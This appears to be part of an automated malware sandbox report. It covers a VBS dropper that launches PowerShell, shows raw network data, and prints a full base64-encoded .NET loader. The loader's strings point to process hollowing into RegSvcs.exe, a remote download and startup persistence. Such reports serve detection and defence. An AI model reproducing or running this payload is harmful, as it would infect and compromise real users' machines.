                      Data Ascii: +bxDRAwDTkhCTEAAA0QjbsALB4PGPEBAPMxEfQwEa6QENExCsEg/S8xDRAwDTwxHNITaO2QEOEBDsEg/b8xDRAwDT0hoKAAAKgiBAIwYokmuI6DIKAAA6gCHfkhCR0BLB4PHPEBAPMhHiqAAAoAKGAgAjhSa6iY/goAAAoDKc8hGKERHsEg/d8QEA8wEW8hBTYAABgPKWYAACMGKppbijBiBAIwYokmuIOJIEEhIsEg/V8xDRAwDT0xHMMBWXwQ
                      2023-03-20 10:39:15 UTC192INData Raw: 73 45 67 2f 59 59 51 45 41 59 77 45 64 38 30 4b 46 77 53 41 2b 7a 68 42 52 41 67 42 54 6f 77 48 4d 30 6c 48 59 64 42 43 4b 77 53 41 2b 6e 77 48 47 45 42 41 47 4d 78 43 66 55 77 45 59 64 52 42 52 6f 41 4c 42 34 76 43 66 59 51 45 41 41 41 41 41 63 4f 4f 47 4d 68 46 52 41 41 41 71 41 41 41 41 59 50 41 45 41 7a 45 71 51 78 2f 2f 37 76 72 34 55 77 4b 43 77 53 41 2b 76 68 43 52 41 67 43 54 63 42 41 45 77 53 41 2b 62 68 43 52 41 67 43 54 6f 68 4b 55 55 41 4c 42 34 66 47 4b 45 42 41 4b 4d 42 47 4b 6f 41 41 41 51 43 4b 47 41 67 41 6a 68 53 61 36 57 49 55 67 6f 41 41 41 4d 43 4b 47 41 67 41 6a 68 53 61 36 57 59 53 67 49 43 4c 42 34 2f 46 4b 45 42 41 4b 4d 52 47 2f 2f 2f 2f 4f 6f 6a 43 41 41 77 43 6f 59 67 44 73 45 67 2f 59 6f 51 45 41 6f 77 45 62 6f 43 43 47 41 51
                      Data Ascii: sEg/YYQEAYwEd80KFwSA+zhBRAgBTowHM0lHYdBCKwSA+nwHGEBAGMxCfUwEYdRBRoALB4vCfYQEAAAAAcOOGMhFRAAAqAAAAYPAEAzEqQx//7vr4UwKCwSA+vhCRAgCTcBAEwSA+bhCRAgCTohKUUALB4fGKEBAKMBGKoAAAQCKGAgAjhSa6WIUgoAAAMCKGAgAjhSa6WYSgICLB4/FKEBAKMRG////OojCAAwCoYgDsEg/YoQEAowEboCCGAQ
                      2023-03-20 10:39:15 UTC208INData Raw: 66 4d 41 41 41 49 67 52 34 51 41 41 41 55 58 66 4b 41 41 41 4b 67 69 42 41 49 77 59 6f 6b 6d 75 52 32 49 49 45 41 41 41 31 74 58 4a 43 41 79 4d 31 39 78 41 41 41 67 41 72 68 44 42 41 41 51 64 39 70 41 41 41 6f 41 4b 47 41 67 41 6a 68 53 61 36 47 5a 75 67 51 41 41 41 55 33 65 6c 49 41 49 7a 51 33 48 44 41 41 41 43 41 4a 4f 45 41 41 41 31 31 6e 43 41 41 67 43 6f 59 41 41 43 4d 47 4b 70 70 62 6b 6c 43 43 42 41 41 51 64 37 56 69 41 67 4d 7a 63 66 4d 41 41 41 49 51 74 34 51 41 41 41 55 58 66 4b 41 41 41 4b 67 69 42 41 49 77 59 6f 6b 6d 75 52 47 4e 49 45 41 41 41 31 74 58 4a 43 41 79 4d 79 39 78 41 41 41 67 41 61 6a 44 42 41 41 51 64 39 70 41 41 41 6f 41 4b 47 41 67 41 6a 68 53 61 36 47 5a 33 67 51 41 41 41 55 33 65 6c 49 41 49 7a 45 33 48 44 41 41 41 43 38 50
                      Data Ascii: fMAAAIgR4QAAAUXfKAAAKgiBAIwYokmuR2IIEAAA1tXJCAyM19xAAAgArhDBAAQd9pAAAoAKGAgAjhSa6GZugQAAAU3elIAIzQ3HDAAACAJOEAAA11nCAAgCoYAACMGKppbklCCBAAQd7ViAgMzcfMAAAIQt4QAAAUXfKAAAKgiBAIwYokmuRGNIEAAA1tXJCAyMy9xAAAgAajDBAAQd9pAAAoAKGAgAjhSa6GZ3gQAAAU3elIAIzE3HDAAAC8P


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:11:39:09
                      Start date:20/03/2023
                      Path:C:\Windows\System32\wscript.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GJ890-1286.vbs"
                      Imagebase:0x7ff722640000
                      File size:163840 bytes
                      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:1
                      Start time:11:39:10
                      Start date:20/03/2023
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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AQAAASkADAcBAAABKwBOBwEAAAEtAGAHAQAAAS8AgAQCAAABMQAiBwEAAAEzAIAAAQAEgAAAAQAAAAAAAAAAAAAAAADSBAAACgAAAAAAAAAAAAAAoQFbAAAAAAAEAAAAAAAAAAAAAACqATMEAAAAAAQAAAAAAAAAAAAAAKoBUgAAAAAAAAAAAAEAAAAcBgAADAAEAA0ABAAOAAgADwAIAAAAEAAaAFAAAAAQAEkAUAAAAAAASwBQACMAkgEjAJwBAAAAAABBYDEAQ29udGV4dFZhbHVlYDEAVG9JbnQzMgBUb0ludDE2AGdldF9VVEY4AEEAQgBDAEQARQBWQUkAUUJYdFgAUHJvamVjdERhdGEAZGF0YQBtc2NvcmxpYgBNaWNyb3NvZnQuVmlzdWFsQmFzaWMAR2V0UHJvY2Vzc0J5SWQAUmVzdW1lVGhyZWFkAFN5bmNocm9uaXplZABSZXBsYWNlAENyZWF0ZUluc3RhbmNlAEFuZGUAR2V0SGFzaENvZGUAUnVudGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUASG9tZQBWYWx1ZVR5cGUAQXBwbGljYXRpb25CYXNlAEFwcGxpY2F0aW9uU2V0dGluZ3NCYXNlAFN0clJldmVyc2UARWRpdG9yQnJvd3NhYmxlU3RhdGUAR3VpZEF0dHJpYnV0ZQBFZGl0b3JCcm93c2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAFN0YW5kYXJkTW9kdWxlQXR0cmlidXRlAEhpZGVNb2R1bGVOYW1lQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAE9iZnVzY2F0aW9uQXR0cmlidXRlAE15R3JvdXBDb2xsZWN0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAWWFub0F0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAU3VwcHJlc3NVbm1hbmFnZWRDb2RlU2VjdXJpdHlBdHRyaWJ1dGUAQnl0ZQBnZXRfVmFsdWUAc2V0X1ZhbHVlAEdldE9iamVjdFZhbHVlAGdldF9TaXplAFNpemVPZgBOZXdMYXRlQmluZGluZwBzZXRfRW5jb2RpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5nAERvd25sb2FkU3RyaW5nAFRvU3RyaW5nAE9wdGljYWwATWFyc2hhbABNaWNyb3NvZnQuVmlzdWFsQmFzaWMuTXlTZXJ2aWNlcy5JbnRlcm5hbABTeXN0ZW0uQ29tcG9uZW50TW9kZWwATGF0ZUNhbGwAa2VybmVsMzIuZGxsAG50ZGxsLmRsbABGaWJlci5kbGwAS2lsbABTeXN0ZW0AQm9vbGVhbgBWZXJzaW9uAFN5c3RlbS5Db25maWd1cmF0aW9uAFN5c3RlbS5HbG9iYWxpemF0aW9uAEludGVyYWN0aW9uAE50VW5tYXBWaWV3T2ZTZWN0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAEV4Y2VwdGlvbgBDdWx0dXJlSW5mbwBaZXJvAFN0YXJ0dXAAc3RhcnR1cABGaWJlcgBCdWZmZXIAUmVzb3VyY2VNYW5hZ2VyAFVzZXIAQml0Q29udmVydGVyAENvbXB1dGVyAENsZWFyUHJvamVjdEVycm9yAFNldFByb2plY3RFcnJvcgBBY3RpdmF0b3IALmN0b3IALmNjdG9yAEludFB0cgBTeXN0ZW0uRGlhZ25vc3RpY3MATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkRldmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJlc291cmNlcwBGaWJlci5SZXNvdXJjZXMucmVzb3VyY2VzAEdldEJ5dGVzAFN0cmlu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